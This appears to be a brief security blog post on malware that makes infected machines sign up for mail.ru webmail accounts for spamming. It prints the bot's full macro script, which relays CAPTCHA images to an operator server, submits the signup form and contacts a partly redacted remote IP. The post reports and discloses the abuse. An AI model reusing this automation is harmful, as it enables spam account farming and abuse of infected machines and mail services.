Just an observation, nothing earth-shattering: We’re seeing infected systems being signed up automatically to mail.ru for spamming.
The spammers use infected machines to sign up for webmail accounts at mail.ru. We saw this about a year and a half ago with Yahoo! Mail accounts. A trivial little script runs which signs the user up:
!GOTO http://www.mail.ru/ www.mail.ru 80
!SLEEP 5
!GOTOLINKTEXT win.mail.ru 80 /cgi-bin/signup win.mail.ru/cgi-bin/signup
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= http://win.mail.ru/cgi-bin/ mailru 1
!SLEEP 200
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
!POST win.mail.ru 80 /cgi-bin/ reg"ID [_HIDDEN_]
Count [_HIDDEN_]
back [_HIDDEN_]
Username [redacted]
RegistrationDomain mail.ru
Password [redacted]
Password_Verify [redacted]
Password_Question %CD%EE%EC%E5%F0+%EF%E0%F1%EF%EE%F0%F2a
Password_CustomQuestion [NULL]
Password_Answer [redacted]
Email [NULL]
FirstName Maks
LastName M
BirthDay 9
BirthMonth 9
BirthYear 1965
Sex 1
Mrim.Country 123
Mrim.Region 0
mra1 0
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
B1 +%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC+%EF%EE%F7%F2%EE%E2%FB%E9+%FF%F9%E8%EA+
!PARSE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/check.php msglist?folder 430 5!GOTO http://66.235.181.25[portions redacted] 66.235.181.25 80
!GOTO http://win.mail.ru/cgi-bin/logout win.mail.ru 80
!FIN
Alex Eckelberry
(Thanks Adam Thomas)